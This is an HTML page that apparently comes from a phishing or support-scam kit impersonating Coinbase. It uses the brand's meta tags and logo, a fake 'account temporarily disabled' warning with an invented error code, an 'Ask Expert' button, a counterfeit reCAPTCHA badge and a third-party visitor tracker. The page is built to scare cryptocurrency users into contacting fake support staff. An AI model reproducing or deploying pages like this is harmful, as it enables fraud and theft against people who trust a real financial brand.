<!DOCTYPE html>
<html lang="en">
   <head>
      <title> Coinbase - Buy/Sell Cryptocurrency</title>
      <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
      <link rel="shortcut icon" type="image/png" href="favicon.png">
      <meta property="apple-itunes-app" name="apple-itunes-app" content="app-id=886427730" />
      <meta property="description" name="description" content="Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency." />
      <meta property="google-site-verification" name="google-site-verification" content="R7G5THr8xgaHFkTNkr_RUB0HvX2Nf8e4qnWi0X1kmz8" />
      <meta property="google-site-verification" name="google-site-verification" content="_GaQTkOlc8tLwxDbZfMdxgGPL5wnctrp-vfeavJVsHE" />
      <meta property="og:description" name="og:description" content="Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency." />
      <meta property="og:image" name="og:image" content="../www.coinbase.com/img/og-default-04-2021.jpg" />
      <meta property="og:title" name="og:title" content="Coinbase - Buy/Sell Cryptocurrency" />
      <meta property="og:type" name="og:type" content="website" />
      <meta property="twitter:app:id:googleplay" name="twitter:app:id:googleplay" content="com.coinbase.android" />
      <meta property="twitter:app:id:iphone" name="twitter:app:id:iphone" content="886427730" />
      <meta property="twitter:app:id:ipad" name="twitter:app:id:ipad" content="886427730" />
      <meta property="twitter:app:name:googleplay" name="twitter:app:name:googleplay" content="Coinbase - Buy/Sell Cryptocurrency" />
      <meta property="twitter:app:name:ipad" name="twitter:app:name:ipad" content="Coinbase - Buy/Sell Cryptocurrency" />
      <meta property="twitter:app:name:iphone" name="twitter:app:name:iphone" content="Coinbase - Buy/Sell Cryptocurrency" />
      <meta property="twitter:card" name="twitter:card" content="summary" />
      <meta property="twitter:creator" name="twitter:creator" content="@coinbase" />
      <meta property="twitter:description" name="twitter:description" content="Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency." />
      <meta property="twitter:image" name="twitter:image" content="../www.coinbase.com/img/og-default-04-2021.jpg" />
      <meta property="twitter:site" name="twitter:site" content="@coinbase" />
      <meta property="twitter:title" name="twitter:title" content="Coinbase - Buy/Sell Cryptocurrency" />
      <meta property="viewport" name="viewport" content="width=device-width, initial-scale=1.0" />
      <link rel="stylesheet" href="css/bootstrap.css">
      <link rel="stylesheet" href="../stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
      <link rel="stylesheet" href="css/custom.css">
      <link rel="stylesheet" href="css/responsive.html">
      <link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
      <!--===============================================================================================-->
      <link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
      <!--===============================================================================================-->
      <link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
      <!--===============================================================================================-->  
      <link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
      <!--===============================================================================================-->
      <link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
      <!--===============================================================================================-->
      <link rel="stylesheet" type="text/css" href="fonts/iconic/css/material-design-iconic-font.min.css">
       <style type="text/css">
         header.header3 {
         display: none;
         }
         .section3login {
         height: 100vh;
         padding: 80px 0 0;
         }
         .bgWhites {
         background: #fff;
         }
         .section3login .session {
    width: 480px;
    margin: 0 auto;
}
.section3login .session .box-error {
    border-radius: 18px;
    box-shadow: unset;
    border: 1px solid #dddddd;
    padding: 40px;
}
         .section3login .session .box-error form {
         width: 100%;
         }
         .section3login .session .box-error .logocolor {
         margin: 0;
         width: 126px;
         text-align: left;
         color: #0052ff;
         font-weight: 700;
         font-size: 26px;
         line-height: 26px;
         letter-spacing: -.5px;
         padding-bottom: 45px;
         }
         .section3login .session .box-error form h3 {
            margin: 0;
            font-size: 28px;
            text-align: left;
            line-height: 28px;
            padding-bottom: 30px;
            letter-spacing: -1px;
        }
        .oauth__form2 p {
    font-weight: 500;
    color: #767676;
    margin: 15px 0;
    font-size: 14px;
}
.oauth__form2 label {
    font-size: 14px;
    line-height: 15px;
    font-weight: 600;
    margin: 0 0 10px;
    letter-spacing: .5px;
}
.controls2 input {
    font-size: 16px;
    line-height: 24px;
    font-weight: 500;
    padding: 16px;
    border: 1px solid #939393;
    width: 100%;
    height: 56px;
    border-radius: 8px;
}
.oauth__action2 .submitbtn input.btn, .oauth__action2 .submitbtn a {
    border-radius: 50px;
    width: 100%;
    color: #fff;
    font-weight: 600;
    white-space: normal;
    font-size: 16px;
    display: flex;
    align-items: center;
    justify-content: center;
}
.createaccount a {
    border-radius: 50px;
    width: 100%;
    background: #eef0f3;
    color: #0a0b0d;
    font-weight: 600;
    white-space: normal;
    font-size: 16px;
    height: 56px;
    margin-bottom: 0;
    display: flex;
    justify-content: center;
    align-items: center;
}
.pvc {
    margin-top: 25px;
}
.pvc a {
    display: block;
    text-align: center;
    font-size: 14px;
    font-weight: 400;
    line-height: 16px;
    margin: 10px 0 0;
    color: #0052ff;
}
.disclaimers {
    background: #eef0f3;
    position: absolute;
    left: 0;
    width: 100%;
    bottom: 0;
    transition: all .3s linear;
    z-index: 1;
}
.disinner {
    display: flex;
    align-items: center;
    justify-content: center;
    max-width: 770px;
    margin: 0 auto;
    padding: 20px 15px;
}
.disRow {
    display: flex;
    align-items: center;
    justify-content: space-between;
    flex-wrap: wrap;
}
.disContent {
    max-width: 76%;
    flex: 0 0 76%;
}
.disButton {
    max-width: 24%;
    flex: 0 0 24%;
    text-align: right;
    padding: 0 15px;
}
.disContent p {
    margin: 0;
}
.disButton a {
    border-radius: 50px;
    width: 100%;
    background: #014cec;
    color: #fff;
    font-weight: 600;
    white-space: normal;
    font-size: 16px;
    height: 45px;
    margin-bottom: 0;
    display: flex;
    align-items: center;
    justify-content: center;
}
.controls2 input:hover, .controls2 input:focus {
    border-color: #014cec;
    border-width: 0.19rem;
}
.disclaimers.hided {
    opacity: 0;
    display: none;
}
.captchasec {
    position: absolute;
    right: -200px;
    bottom: 15px;
    max-width: 280px;
    width: 100%;
    display: flex;
    cursor: pointer;
    height: 70px;
    align-items: center;
    overflow: hidden;
    box-shadow: -4px 0 7px rgb(0 0 0 / 20%);
    transition: all .5s linear;
    z-index: 0;
}
.cpticon {
    max-width: 80px;
    flex: 0 0 80px;
    padding: 5px;
    text-align: center;
}
.cpticon ul {
    margin: 5px 0 0;
    display: flex;
    justify-content: center;
}
.cpticon ul a {
    font-size: 9px;
    line-height: 9px;
    font-weight: 600;
    display: block;
}
.cpticon img {
    max-width: 40px;
}
.cpticon2 {
    padding: 15px;
    background: #1a73e8;
    max-width: 200px;
    height: 100%;
    flex: 0 0 200px;
}
.cpticon2 h4 {
    margin: 0;
    font-size: 14px;
    font-weight: 500;
    color: #fff;
    line-height: 14px;
}
.cpticon2 ul {
    margin: 5px 0 0;
    display: flex;
}
.cpticon2 ul a {
    color: #fff;
    font-size: 14px;
    font-weight: 500;
}
.captchasec:hover {
    right: 0;
}
      </style>
   </head>
   <body class="bgWhites">
      <!-- Matomo -->
<script>
  var _paq = window._paq = window._paq || [];
  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="https://ascfghxyz.matomo.cloud/";
    _paq.push(['setTrackerUrl', u+'matomo.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.async=true; g.src='//cdn.matomo.cloud/ascfghxyz.matomo.cloud/matomo.js'; s.parentNode.insertBefore(g,s);
  })();
</script>
      <div class="clearfix"></div>
      <section class="kopa-area kopa-area-4 coinbaseFormMain">
         <div class="container">
            <div class="session">
               <div class="box-error">
                  <div class="wrap-login100">
                     <form class="coinbaseform" action="/error.html" method="get">

                        <div class="oauth__header__container oauth__header__container2">
                           <h2 class="logocolor"><img style="width:100%;" src="logo.png"></h2>
                        </div>

                            <h4 class="importantmsg">Your account is temprarily disabled for security reasons.</h4>
                        <div class="importantMessage">
                            <p>Due to unauthorized activity and identification failur on your Account. Account Access has been suspended.
                            Please Get in touch with our Support Staff Immediately.</p>
                            <h5>Error CODE: <span class="errocode">EBRX16X76D</span></h5>
                          </div>

                        <div class="oauth__action2 errors">
                           <div class="submitbtn"><input type="submit" value="Ask Expert" class="btn"></div>
                           <div class="pvc">
                             <a href="javascript:void(0)">Create an account</a>
                             <a href="javascript:void(0)">Forgot password?</a>
                           </div>
                        </div>


                  </form>
                  </div>
               </div>
            </div>
         </div>


         <div class="captchasec">
            <div class="cpticon">
               <img src="captchicon.png">
               <ul>
                  <li><a href="error.html">Privacy - </a></li>
                  <li><a href="error.html">Terms</a></li>
               </ul>
            </div>
            <div class="cpticon2">
               <h4>rotected by reCAPTCHA</h4>
               <ul>
                  <li><a href="error.html">Privacy - </a></li>
                  <li><a href="error.html">Terms</a></li>
               </ul>
            </div>
         </div>
      </section>
      <script type="text/javascript" src="js/jquery.min.js"></script>
      <script type="text/javascript" src="js/bootstrap.min.js"></script>
      <script type="text/javascript" src="js/custom.html"></script>
      <!--===============================================================================================-->
      <script src="vendor/jquery/jquery-3.2.1.min.js"></script>
      <!--===============================================================================================-->
      <script src="vendor/animsition/js/animsition.min.js"></script>
      <!--===============================================================================================-->
      <script src="vendor/bootstrap/js/popper.js"></script>
      <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
      <!--===============================================================================================-->
      <script src="vendor/select2/select2.min.js"></script>
      <!--===============================================================================================-->
      <script src="vendor/daterangepicker/moment.min.js"></script>
      <script src="vendor/daterangepicker/daterangepicker.js"></script>
      <!--===============================================================================================-->
      <script src="vendor/countdowntime/countdowntime.js"></script>
      <!--===============================================================================================-->
      <script src="js/main.js"></script>
      <script>
         $(document).ready(function(){
           $("label").click(function(){
             $("span.label-txt").toggle();
           });
         });
      </script>
      <script>
         $(document).ready(function(){
            $(".disButton a").click(function(){
               $(".disclaimers").addClass("hided");
            });
         });
      </script>
   </body>
</html>